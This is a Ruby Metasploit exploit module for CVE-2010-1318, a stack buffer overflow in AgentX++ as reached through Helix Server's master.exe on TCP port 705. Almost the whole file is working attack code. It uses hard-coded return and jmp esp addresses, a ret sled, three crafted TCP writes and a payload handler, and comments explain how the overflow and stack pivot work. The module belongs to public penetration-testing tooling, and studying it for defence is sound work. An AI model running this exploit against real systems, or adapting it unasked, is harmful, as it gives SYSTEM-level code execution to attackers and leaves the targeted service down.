##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
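class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  # include Msf::Exploit::Remote::Seh

  # Exploit metadata for the AgentX++ AgentX::receive_agentx stack buffer
  # overflow (CVE-2010-1318) as reached through Helix Server's master.exe.
  #
  # Operator caveats, all grounded in the description and target data below:
  # - BufAddr, Ret and JmpEsp are hard-coded for the bundled master.exe and
  #   msvcp71.dll, and BufAddr is noted as varying between runs, so a miss is
  #   likely on other builds or a different heap layout.
  # - There is no DEP/NX bypass: the ret sled / jmp esp chain executes out of
  #   the request buffer, and nothing here can detect DEP remotely before firing.
  # - master.exe runs as SYSTEM with no service recovery action, so a crashed
  #   attempt leaves the service down until the host reboots.
  #
  # @param info [Hash] module info merged by the framework via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow',
        # NOTE(review): the last sentence of this description ("The address")
        # is truncated in the upstream text; it is reproduced unchanged here.
        'Description' => %q{
          This exploits a stack buffer overflow in the AgentX++ library, as used by
          various applications. By sending a specially crafted request, an attacker can
          execute arbitrary code, potentially with SYSTEM privileges.

          This module was tested successfully against master.exe as included with Real
          Network\'s Helix Server v12. When installed as a service with Helix Server,
          the service runs as SYSTEM, has no recovery action, but will start automatically
          on boot.

          This module does not work with NX/XD enabled but could be modified easily to
          do so. The address
        },
        'Author' => [ 'jduck' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-1318' ],
          [ 'OSVDB', '63919'],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867' ]
        ],
        # master.exe runs as SYSTEM when installed as a service (see description).
        'Privileged' => true,
        'DefaultOptions' => {
          # 'EXITFUNC' => 'seh',
        },
        'Payload' => {
          'Space' => 1024, # plenty of space
          'BadChars' => "", # none!
          'DisableNops' => true,
          # 81 C4 F0 EF FF FF = add esp, -0x1010: moves ESP below the payload
          # before it runs, the usual precaution so the payload's own stack
          # use does not overwrite its code.
          'PrependEncoder' => "\x81\xc4\xf0\xef\xff\xff"
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Helix Server v12 and v13 - master.exe',
            {
              # The BufAddr varies :-/ -- presumably the address of the
              # BufSize-byte request buffer; not stable across runs.
              # 'BufAddr' => 0xea3800,
              'BufAddr' => 0x1053880,
              'BufSize' => 25000, # If this is too large, the buf is unmapped on free
              'Ret' => 0x46664b, # mov esp,ebp / pop ebp / ret in master.exe
              'JmpEsp' => 0x7c3d55b7 # jmp esp from bundled msvcp71.dll
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-04-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          # A wrong Ret/BufAddr crashes master.exe; per the description the
          # service has no recovery action, so it stays down until reboot.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # 705 is the standard AgentX master agent port.
    register_options([Opt::RPORT(705)])
  end

  # Drive the overflow with three TCP writes, mirroring how the vulnerable
  # receive path consumes its input:
  #   1. 19 bytes: a 16-byte AgentX-style header plus the first three bytes of
  #      the big-endian body length, which almost fills the fixed stack buffer;
  #   2. the final length byte followed by the bytes that overwrite the saved
  #      EBP and the return address;
  #   3. BufSize bytes of body: a ret sled, a jmp esp gadget, the payload and
  #      random fill, laid out so the pivot (mov esp,ebp / pop ebp / ret)
  #      lands ESP inside the sled.
  #
  # Side effects: opens and closes the module's TCP socket, starts the
  # payload handler.  A failed attempt leaves master.exe down (see Notes).
  #
  # @return [void]
  def exploit
    print_status("Trying target #{target.name}...")

    connect
    print_status("Triggering the vulnerability... Cross your fingers!")

    num = target['BufSize']
    num_str = [num].pack('N')
    # Encode once; the length is needed before the bytes are sent.
    shellcode = payload.encoded

    # First send 19 bytes to almost fill the buffer...
    # Header: version 1, random type, flags with bit 0x10 forced on (the
    # network-byte-order flag, matching the big-endian 'N' length above),
    # random reserved byte, then random filler up to 16 bytes.
    hdr = ''
    hdr << [0x01, rand(256), 0x10 | rand(256), rand(256)].pack('CCCC')
    hdr << rand_text(16 - hdr.length)
    # hdr << "QQQQRRRRSSSS"
    hdr << num_str[0, 3]
    sock.put(hdr)

    # Wait to make sure it processed that chunk.
    sleep(0.5)
    # print_status("press enter to trigger..."); x = $stdin.gets

    # Send the rest (smashed!)
    hdr = ''
    hdr << num_str[3, 1]

    # NOTE: this stuff is extra, but doesn't count towards the payload..
    hdr << rand_text(8)
    # hdr << "EEEEFFFF"

    # becomes ebp: point the saved frame pointer into the middle of the body
    # buffer (presumably at BufAddr), on a 4-byte boundary relative to the
    # buffer start so the pivot's pops line up with the 4-byte sled entries.
    # The previous code rounded on (BufSize % 4), which leaves the offset
    # misaligned for many sizes (e.g. 25004); round the offset itself instead.
    # For the default BufSize of 25000 the resulting address is unchanged.
    base = target['BufAddr']
    offset = num / 2
    offset += (4 - (offset % 4)) % 4
    new_ebp = base + offset
    hdr << [new_ebp].pack('V')

    # becomes eip
    # hdr << "\xef\xbe\xad\xde"
    hdr << [target.ret].pack('V')

    # NOTE: sending more data will smash the low (up to 3) bytes of the socket handle -- no fun
    sock.put(hdr)

    # Send the data that we said we would...
    # Body layout: num_rets entries pointing at the bare `ret` (Ret + 3),
    # then the jmp esp gadget, then the payload, then random fill to BufSize.
    num_rets = (num - shellcode.length - 4) / 4
    sled = Array.new(num_rets, target.ret + 3)
    sled << target['JmpEsp']

    body = sled.pack('V*')
    body << shellcode
    # make sure we have all the bytes, or we wont reach the path we want.
    body << rand_text(num - body.length)

    sock.put(body)

    handler
    disconnect
  end
end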